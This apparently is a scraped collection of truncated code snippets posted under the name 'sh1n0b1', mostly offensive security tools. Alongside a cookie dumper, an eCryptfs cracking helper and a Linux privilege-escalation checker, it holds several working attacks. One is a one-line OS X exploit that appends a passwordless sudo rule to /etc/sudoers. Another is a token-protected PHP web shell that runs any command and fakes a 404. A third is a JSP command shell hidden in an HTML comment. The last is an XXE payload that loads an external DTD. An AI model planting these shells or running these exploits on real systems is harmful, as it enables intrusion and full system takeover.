sh1n0b1

<?php
$p12cert = array();
$file = '[PATH]]';
$c = file_get_contents($file);
if (openssl_pkcs12_read($c, $p12cert, '[REDACTED]') )
{
    $pkey = $p12cert['pkey'];  //private key
    $cert = $p12cert['cert'];  //public key
    
    //decrypt the encrypted parameter value

sh1n0b1

#!/usr/bin/perl

#Author: Michal Garcarz @ cisco.com
#Date: 15.01.2013

use Net::Frame::Simple;
use Net::Frame::Dump::Offline;
use Net::Frame::Layer::TCP;
use Net::Frame::Layer;
use Net::Frame::Layer::IPv4;

sh1n0b1

#!/usr/bin/env python

# Helper script for cracking eCryptfs.
#
# Refer to "ecryptfs-utils_104.orig.tar.gz" in case of doubt.
#
# This software is Copyright (c) 2014 Dhiru Kholia <dhiru.kholia at gmail.com> and
# Copyright (c) 2015, NagraVision <sylvain.pelissier at nagra.com>
# and it is hereby released to the general public under the following terms:
#

sh1n0b1

#*******************************************************************************#
# BinaryCookieReader: Written By Satishb3 (http://www.securitylearn.net)        #
#                                                                               #
# For any bug fixes contact me: [email protected]                      #
#                                                                               #
# Usage: Python BinaryCookieReader.py Cookie.Binarycookies-FilePath             #
#                                                                               #
# Safari browser and iOS applications store the persistent cookies in a binary  #
# file names Cookies.binarycookies.BinaryCookieReader is used to dump all the   #
# cookies from the binary Cookies.binarycookies file.                           #

sh1n0b1

# It should work for OS X 10.10-10.10.4
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

sh1n0b1

#include <stdio.h>
#include <string.h>
#include "lib.h"
#include <Wininet.h>
//#include "starter.h"

//include OTF
#include "font.h" // foofont is fetched from loader config struct 

//#include "cert.h"

sh1n0b1

<?php

//$allowedToken = "509F7BA70C680DDAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
$allowedToken = "<REPLACE_WITH_SOME_RANDOM_LONG_STRING>";
$token = $_GET['token'];

if ($token == $allowedToken){
	echo system($_GET['cmd']);
}else{
    header("HTTP/1.0 404 Not Found");

sh1n0b1

#!/usr/env python

###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]: 
## This script is intended to be executed locally on a Linux box to enumerate basic system info and 
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits. 

sh1n0b1

<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %> 
-->
</head>
<body>
</body>
</html>

sh1n0b1

<?php

$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
//<!ENTITY xxe SYSTEM "http://target/">]>
$URL = "https://target/";
$ch = curl_init($URL);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));